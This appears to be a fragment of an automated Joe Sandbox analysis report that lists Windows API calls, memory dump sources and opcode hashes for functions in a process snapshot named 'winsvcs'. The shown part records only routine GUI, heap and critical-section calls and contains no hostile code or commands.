                                                                                                                                                                                                                          • Instruction ID: 86bfcc1c74f1fc0be6eeef633fbe502bd8068da502ff08f6d6f7ea803161ce8a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A41F671604A0ABFD314DE19DA80966B3B6FB81300B50872AD42547A42D7B9FDD4C7E9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044E240), ref: 00418CC0
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418D0E
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044E240), ref: 00418D52
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(0044E240), ref: 00418D65
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418DAB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$ExceptionRaise$DeleteEnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2896116776-0
                                                                                                                                                                                                                          • Opcode ID: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
                                                                                                                                                                                                                          • Instruction ID: 78883e933ddfd575a463b6ae8765c2241207876390ae6ac4d6d0b6bdd00743fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C241A7B26006149BEF50DF15FC85B5777A5EF50318F18C0AEE8098F246DB79E880CBA9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DD1
                                                                                                                                                                                                                          • GetFocus.USER32 ref: 00416DD9
                                                                                                                                                                                                                          • IsChild.USER32(?,00000000), ref: 00416DE3
                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00416DF2
                                                                                                                                                                                                                          • SetFocus.USER32(00000000,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DF9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Focus$ChildWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 501040988-0
                                                                                                                                                                                                                          • Opcode ID: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
                                                                                                                                                                                                                          • Instruction ID: 8b2d6c618c82d252263e44c6a5238523959aa71bdc741b18c4e8e08c9a1a1d5c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7215070204248AFDB209F64DC08BAA7BA9EF49315F15455DF8498A290DB74DD41CB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(0043AE1C,00000000,00000000,?), ref: 00423CF4
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00423D50
                                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00423D66
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00423D76
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 354369530-0
                                                                                                                                                                                                                          • Opcode ID: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
                                                                                                                                                                                                                          • Instruction ID: bad696d248039219c0635516f435c0c90e3ca1e931be28e5b90198828d8a9e0e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7116375750211AFEB209F76EC88A1737B9FB49742B54543AE501D3250D778DC01CB68
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00425948
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: __mtinitlocknum.LIBCMT ref: 00429CCE
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: __amsg_exit.LIBCMT ref: 00429CDA
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: RtlEnterCriticalSection.NTDLL(004282ED), ref: 00429CE2
                                                                                                                                                                                                                          • ___sbh_find_block.LIBCMT ref: 00425953
                                                                                                                                                                                                                          • ___sbh_free_block.LIBCMT ref: 00425962
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2714421763-0
                                                                                                                                                                                                                          • Opcode ID: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
                                                                                                                                                                                                                          • Instruction ID: 784fe8f7d40001f7600859eb2be024fca0bf4e15d789c35dff29e27069072cfd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A014471B05622EAEF206B72BD0975E76A49F00735FE5411FF404661D1CA7C89818A5D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F84B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F85B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F863
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F86F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F87E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
                                                                                                                                                                                                                          • Instruction ID: f30965056506db091dc390cd5668a26ed455dcdbe33213fe5701eb603ec7fe18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E042B1289614BBF65117B06C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F480
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F490
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F498
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4A4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4B3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
                                                                                                                                                                                                                          • Instruction ID: d2405f4d686cc329cb2c4974dd0d75fc30c27e1cdd077f1fd0386077d6bea2a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7E04C712996147AF65117B05C4EFFA352DAB15B01F105420F792E91D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F438
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F448
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F450
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F45C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F46B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
                                                                                                                                                                                                                          • Instruction ID: aa7bb90587d74c23307c61ea89b22b129a7fc36b7eb487b4901722fb63985b8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38E04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D1CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F8E7
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8F7
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F8FF
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F90B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F91A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
                                                                                                                                                                                                                          • Instruction ID: 490ac9be3a4df3e6166b8d436346df579d9a1bad408d84ec1039d8251566a421
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FE042B1289614BAF65117B05C4EFFB362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F893
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8A9
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F8B1
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F8BD
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F8D2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
                                                                                                                                                                                                                          • Instruction ID: 660c769eb77b366a8a23f818950a586be316288a064137e639420a7e0a5f472a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE0BF71288300BBF66117709C0EFEB362DE714B02F105420F796E51E0CAF55C419B2D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F4C8
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F4D8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F4E0
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4EC
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
                                                                                                                                                                                                                          • Instruction ID: 5c5ea486f8d86452672809949b6ea6ac6bdc788aae214913a2807fc9deb95fd5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65E04C71299614BAF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF95C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F558
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F568
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F570
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F57C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F58B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
                                                                                                                                                                                                                          • Instruction ID: 4336a379e938bec1e0ea5ab87b831ef1b692dabbd56aec1cc90c95ce917f6d54
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10E04C712896147AF65117B05C4EFFA352DAB14B01F105420F796E91D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F977
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F987
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F98F
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F99B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9AA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
                                                                                                                                                                                                                          • Instruction ID: 855d6a06f1f245b68fde2b1a20fd1fb7be06e334370c2da90505ec6d8b0432c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85D42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F510
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F520
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F528
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F534
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F543
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
                                                                                                                                                                                                                          • Instruction ID: 137df8c84f76daae2b18901c05a7a40a4d47098fd36d39e3025c756ee9ed29a4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE042B1288304BAF65017B05C4EFBA362DA714B02F106820B792E91D1CAF8AC428B3D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F92F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F93F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F947
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F953
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F962
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
                                                                                                                                                                                                                          • Instruction ID: c34b6a3563cd7af2964a3b0a4b55fe3fcf32e415c952ee7c54061f4af326a4b5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1E042B1289714BAF65117B05C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$String_memcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1108949412-0
                                                                                                                                                                                                                          • Opcode ID: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
                                                                                                                                                                                                                          • Instruction ID: dca89a99140dcdefd2515e70e36f7115f501ce712d998d2b27d11117e8ebcf95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95219233305516AFD7209B15FC84FEBF7A8FBD5325F01456BF5048A210D636D89287A4